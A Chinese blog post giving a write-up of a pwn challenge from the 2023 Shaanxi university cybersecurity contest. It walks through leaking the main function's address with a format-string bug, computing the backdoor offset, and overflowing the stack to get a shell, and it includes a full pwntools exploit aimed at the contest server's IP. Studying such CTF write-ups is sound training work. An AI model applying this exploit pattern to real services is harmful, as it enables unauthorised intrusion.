2023陕西省大学生网络安全技能大赛pwn陕西游玩题解

已于 2023-06-04 23:13:23 修改
阅读量218 收藏 1
点赞数
分类专栏: pwn 文章标签: python
于 2023-06-04 10:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfpwn/article/details/131029239
版权

首先checksec~

af573347a48e41f0a0ec0443e85ba995.png

发现开了pie

然后ida看看

96ebb30db662455e8352306db1174519.png

 

3156de2718fe4ce2abc3179e6c290b32.png

55b247566c5f4ac9863fe73b61b803ea.png

可以看到输入1是一个栈溢出,输入2有一个格式化字符串

而且还找到了后门函数

8a1e874b15314f7a8345c5975c37bbf2.png

那么我们就要想办法泄露出一个函数真实地址,以此来计算偏移得到后门函数的地址从而getshell

gdb调试:

在printf处下一个断点,再输入一串%p

4de717c844bb4bb5ac37a231f2510769.png

 

 接着回车之后看下栈

 4b60c0f9a73942e598684ebf1b92cad1.png

 可以发现在0x7fffffffdf18处存放了main函数的地址,而printf输入时的位置在0x7fffffffdeb0,并且64位传参前6个参数要放在寄存器中,那么实际main函数真实地址相对格式化字符串参数的位置为(0x7fffffffdf18-0x7fffffffdeb0)/8+6=19

接着计算main与后门函数的偏移,直接ida看后四位再相减就欧克了,代码如下

io.recvuntil('Your choice :\n')
io.sendline('2')
payload = '%19$p'
io.sendlineafter('\n',payload)
addr = int(io.recv(16).decode(),16)
print(addr)
main = 0x12EB
shell = 0x129A
offset = main-shell
shelladr = addr-offset

 然后就是愉快的ret2text过程。完整exp如下

from pwn import*
#context.log_level = 'debug'
io = remote('121.196.192.181', 10001)
io.recvuntil('Your choice :\n')
io.sendline('2')
payload = '%19$p'
io.sendlineafter('\n',payload)
addr = int(io.recv(16).decode(),16)
print(addr)
main = 0x12EB
shell = 0x129A
offset = main-shell
shelladr = addr-offset
io.sendlineafter('Your choice :\n','1')
io.recvuntil('Mountain')
payload = b'a'*(0x28)+p64(shelladr)

io.sendline(payload)
io.interactive()
 

 希望对各位有所帮助。

 

 

rbp
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023第三届陕西省大学生网络安全技能大赛--本科高校组 Reverse题解
OrientalGlass的博客
06-03 4342
这次比赛总体感觉很好,比前几天黑盾杯和国赛坐牢要好太多,虽然一些题目没见过,但是在网上查一下就能找到相关文章和工具还要重视理论知识水平,不能做脚本小子,这些题目虽然有现成的工具做,但还是要了解一下相关原理,不然下次变一下就呆住了.例如这个的babypython,以前都是用工具或者脚本直接干pyc文件,这次只能生啃字节码(还好有gpt强大的分析能力),甚至还有很多混淆和跳转代码,也是锻炼到了啃字节码的能力另一方面,个人的经验还是不足,还要继续多做题,多比赛,多复现,勤能补拙。
2023第三届陕西省大学生网络安全技能大赛 MISC PWN RE
weixin_51890658的博客
07-28 225
直接放进010分析,key1已知,但有坑,有两个key2,pe⽂件尾部为真,最后拼接获得flag flag is flag{key1_key2},but where is the key?下载得到压缩包,爆破得到密码258369,得到流量包和图⽚ Wireshark打开,题⽬提示dns,过滤dns,发现test.com前⾯有字符,打印出hex值转字符,,发现维吉 尼亚密码,求密钥。假:key2:PE_sT3uctU3e_1$ 真:key2:PE_sT3uctU3e_1$_suBt1e flag{w0w!
ciscn2021 西北分区赛部分pwn
mishixiaodai的博客
06-07 268
xb_pwn_easy 分析发现是道整数溢出的题,unsigned int8最大数为255,当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0,也可以造成溢出,原因是read的第三个参数v4-1=-1,又read的第三个参数类型是size_t,当输入负值时,会将其转换为无符号数。 利用整数溢出漏洞,可以覆盖age、email、phone,可以将email覆盖为函数的got地址,这样就可以获得函数的地址并且得到libc的基地址。 修改puts函数的got表。一开始我将phone覆盖为puts_
南华大学2022第五届网络安全竞赛wp
IDONOTTKONW的博客
06-08 1092
南华大学第五届网络安全竞赛题解
CTF--2016湖湘杯全国网络安全技能大赛之栈溢出pwnme
关注互联网安全的小虾米一枚
03-30 6526
0x01 基础知识 本题目考察逆向分析,漏洞挖掘以及利用能力。 学习本篇技术,提前储备好栈溢出相关知识。 关键技术点 scanf函数溢出漏洞 0x02 基本分析 拿到题目先对其进行基本分析,使用工具checksec.sh脚本检测。 根据这个判断程序运行在32位系统之上。没有开启canary和nx保护。 猜测题目考察内容多为溢出漏洞。运行程序
第三届陕西省大学生网络安全技能大赛部分WriteUp
Geek极安云科-致力于网络安全事业
06-05 949
目录扫描发现robots.txt文件,访问/sub
第一届广东省大学生网络安全攻防大赛PWN Writeup
SkYe's Blog
05-24 3520
两个题目都是无输出堆题,最近一次比赛在 nepctf 遇到:https://www.mrskye.cn/archives/bdb75c49/#sooooeasy 思路方法概述:https://www.jianshu.com/p/fe28639e406e BabyNote 题目是基于 glibc 2.31 的菜单堆题。 漏洞出现在 free 之后没有置零指针导致的 UAF : 程序没有输出函数,倒是有一个提示的函数 gift 函数,输出堆地址最低两个字节,没用明白,到最后也不关他的事情。 思路: 利.
【广东大学生网络攻防大赛Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
“东华杯”2021大学生网络安全邀请赛.zip
12-07
"东华杯"2021大学生网络安全邀请赛是一场旨在提高大学生网络安全技能和意识的重要赛事。CTF,即Capture The Flag,是网络安全领域的一种竞赛形式,参赛者需要运用各种安全技能解决难题,捕获特定的目标("flag")...
全国网络与信息安全管理职业技能大赛2020题库
09-30
全国网络与信息安全管理职业技能大赛2020题库 一、《网络安全管理实践》 二、《信息安全技术》 三、《信息安全技术》其它题库 四、《网络安全合规指引》 五、《互联网内容安全管理》 六、《互联网上网服务营业场所...
长春理工大学第六届网络安全校赛题目
06-15
内有re+web+pwn+misc杂项 博文地址:https://blog.csdn.net/m0_64659074/article/details/123853255?spm=1001.2014.3001.5502
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1216
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
Ansys Zemax|场曲跟畸变图的前世今生
ueotek的博客
07-02 383
这里的y和z坐标和方向余弦是(Hx, Hy, Px, Py)=(X, X, 0 ,0)和(Hx, Hy, Px, Py)=(X, X, 0 ,0.001),在光线追迹像面的前一个平面的 z坐标和方向余弦。OpticStudio通过在X和Y方向(弧矢和子午方向)的傍轴光线追踪确定近轴图像平面的Z坐标,并测量该近轴焦平面与系统图像平面的Z坐标之间的距离。使用附件中的样本文件,近轴像面的全局Z坐标与视场0处的像面位置之差与场曲和畸变图中的的Tan Shift相同。近轴像面的定义是以下两个光线交点的全局Z坐标。
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 1054
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
Python进阶】函数的扩展
weixin_52854743的博客
07-06 542
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
Java高级重点知识点-19-Lambda
m0_72926194的博客
07-02 489
本文主要是讲解了如何使用lambda表达式来简介代码开发,同时讲解了函数式编程思想,该思想主要的是体现做什么,而不是怎么做。
制作爬取4399游戏名称软件
最新发布
fasdaegaw的博客
07-06 131
请求头={'User-Agent':'Mozilla/5.0 (Windows NT 10.0;网站源代码=requests.get(url=链接,headers=请求头).text #发送请求并且拿到网站源代码。class属性的结果=初始化.find(class_="tm_list") #class是关键字。li标签内容=class属性的结果.find_all('li') #list。链接='https://www.4399.com/' #网站链接。#发送请求并且拿到源代码。
CTF网络安全大赛培训
09-02
CTF网络安全大赛培训主要面向学生、零安全基础、新手、测试转安全、开发转安全、运维转安全、安服转安全以及对网络安全比较感兴趣的同学。这种培训通常涵盖了一系列的题目类型,包括Web渗透、RE逆向、Misc杂项、PWN...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值